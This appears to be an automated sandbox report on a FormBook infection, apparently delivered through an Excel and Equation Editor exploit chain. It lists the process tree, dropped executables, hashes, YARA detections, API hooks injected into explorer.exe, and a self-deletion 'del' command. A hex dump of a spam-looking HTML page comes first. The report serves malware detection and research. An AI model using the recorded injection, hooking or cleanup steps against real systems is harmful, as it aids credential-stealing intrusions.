                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b9 f3 d1 f4 bd b5 c4 bd bd cc d3 fd d7 c9 d1 af d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 33 34 35 37 3b 26 23 33 33 39 32 32 3b 26 23 33 34 39 38 37 3b 26 23 32 31 35 36 30 3b 26 23 32 32 30 36 30 3b 26 23 33 30 33 34 30 3b 26 23 33 36 32 33 34 3b 26 23 32 36 34 36 39 3b 26 23 33 36 32 33 34 3b 26 23 32 39 32 34 35 3b 2c 26 23 33 38 36 33 39 3b 26 23 33 38 36 33 39 3b 26 23 33 34 39 38 37 3b 26 23 32 32 32 33 35 3b 26 23 32 30 30 31 30 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 32 35 33 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 34 30 33 37 3b 26 23 32 32 33 32 30 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 33 33 39 34 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 33 34 35 37 3b 26 23 33 33 39 32 32 3b 26 23 33 34 39 38 37 3b 26 23 32 31 35 36 30 3b 26 23 32 32 30 36 30 3b 26 23 33 30 33 34 30 3b 26 23 33 36 32 33 34 3b 26 23 32 36 34 36 39 3b 26 23 33 36 32 33 34 3b 26 23 32 39 32 34 35 3b 2c 26 23 33 38 36 33 39 3b 26 23 33 38 36 33 39 3b 26 23 33 34 39 38 37 3b 26 23 32 32 32 33 35 3b 26 23 32 30 30 31 30 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 32 35 33 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 34 30 33 37 3b 26 23 32 32 33 32 30 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 33 33 39 34 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 38 36 33 39 3b 26 23 33 38 36 33 39 3b 26 23 33 34 39 38 37 3b 26 23 32 32 32 33 35 3b 26 23 32 30 30 31 30 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 32 35 33 30 32 3b 26 23 33 36 38 32 37 3b 26 23 32 34 30 33 37 3b 26 23 32 32 33 32 30 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 33 33 39 34 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 2c 26 23 33 33 34 35 37 3b 26 23 33 33 39 32 32 3b 26 23 33 34 39 38 37 3b 26 23 32 31 35 36 30 3b 26 23 32 32 30 36 30 3b 26 23 33 30 33 34 30 3b 26 23 33 36 32 33 34 3b 26 23 32 36 34 36 39 3b 26 23 33 36 32 33 34 3b 26 23 32 39 32 34
                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#33457;&#33922;&#34987;&#21560;&#22060;&#30340;&#36234;&#26469;&#36234;&#29245;,&#38639;&#38639;&#34987;&#22235;&#20010;&#30007;&#20154;&#25302;&#36827;&#24037;&#22320;,&#22269;&#20135;&#33394;&#22108;&#22108;&#22108;&#22312;&#32447;&#31934;&#21697;,&#22269;&#20135;&#97;&#118;&#27704;&#20037;&#31934;&#21697;&#26080;&#30721;</title><meta name="keywords" content="&#33457;&#33922;&#34987;&#21560;&#22060;&#30340;&#36234;&#26469;&#36234;&#29245;,&#38639;&#38639;&#34987;&#22235;&#20010;&#30007;&#20154;&#25302;&#36827;&#24037;&#22320;,&#22269;&#20135;&#33394;&#22108;&#22108;&#22108;&#22312;&#32447;&#31934;&#21697;,&#22269;&#20135;&#97;&#118;&#27704;&#20037;&#31934;&#21697;&#26080;&#30721;" /><meta name="description" content="&#38639;&#38639;&#34987;&#22235;&#20010;&#30007;&#20154;&#25302;&#36827;&#24037;&#22320;,&#22269;&#20135;&#33394;&#22108;&#22108;&#22108;&#22312;&#32447;&#31934;&#21697;,&#22269;&#20135;&#97;&#118;&#27704;&#20037;&#31934;&#21697;&#26080;&#30721;,&#33457;&#33922;&#34987;&#21560;&#22060;&#30340;&#36234;&#26469;&#36234;&#2924


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: USER32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEC
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEC
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEC
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEC

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:17:21:15
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f340000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:17:21:41
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:17:21:47
                                        Start date:13/05/2022
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:277920 bytes
                                        MD5 hash:69250F55FBFE48822C838B4EEAF33A0A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 37%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:5
                                        Start time:17:21:51
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                                        Imagebase:0x1320000
                                        File size:80384 bytes
                                        MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Target ID:6
                                        Start time:17:21:54
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                                        Imagebase:0x1320000
                                        File size:80384 bytes
                                        MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Target ID:7
                                        Start time:17:21:58
                                        Start date:13/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff040000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:8
                                        Start time:17:22:16
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\svchost.exe
                                        Imagebase:0xb20000
                                        File size:20992 bytes
                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:9
                                        Start time:17:22:21
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
                                        Imagebase:0x4a7f0000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        No disassembly